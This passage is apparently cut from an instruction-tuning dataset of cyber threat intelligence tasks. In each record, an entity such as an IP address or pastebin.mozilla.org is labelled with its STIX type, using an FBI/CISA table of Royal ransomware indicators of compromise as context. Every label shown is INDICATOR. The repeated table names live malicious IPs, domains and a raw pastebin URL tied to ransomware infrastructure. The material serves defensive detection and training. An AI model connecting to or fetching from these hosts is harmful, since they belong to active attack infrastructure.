"input": "### Entity:\n23.111.114.52\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\npastebin.mozilla.org\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n134.35.9.209\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n147.135.11.223\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n5.44.42.20\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.227.251.167\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n193.235.146.104\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious 